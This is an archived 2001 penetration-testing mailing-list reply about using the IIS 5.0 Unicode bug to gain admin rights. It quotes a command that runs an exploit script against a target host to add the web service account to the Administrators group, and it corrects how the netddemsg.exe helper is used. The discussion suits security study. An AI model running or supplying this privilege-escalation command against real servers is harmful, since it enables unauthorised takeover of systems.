Penetration Testing mailing list archives
Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug?
From: Nelson Brito <nelson () SECUNET COM BR>
Date: Mon, 26 Mar 2001 15:03:41 -0300
Nelson Brito wrote:
[...]
C:\BIGHacker>unicodexecute2.pl www.victim.com:80 "netddemsg.exe \"C:\\WINNT\\system32\\net.exe localgroup Administrators IUSR_MACHINE /add\""
Sorry, it was a *BIG* mistake, the correct use of netddemsg.exe is: netddemsg.exe [-s sharename] <command line> So, you'll need put the share's name to it work. Sem mais, -- # Nelson Brito - IBQN / Security Networks AG - The trust Company! # "Windows NT can also be protected from nmap OS detection scans # thanks to *Nelson Brito* ..." # Passage from "Hack Proofing your Network", page 93 open(S,shift) || die "Use: $0 <file>\n"; foreach(<S>){ chop; split(//,$_); print reverse @_; print "\n"; } close(S);
Current thread:
- [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)
- <Possible follow-ups>
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Wertheimer, Ishai (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? H D Moore (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 27)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 27)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 28)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? robmann (Mar 28)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)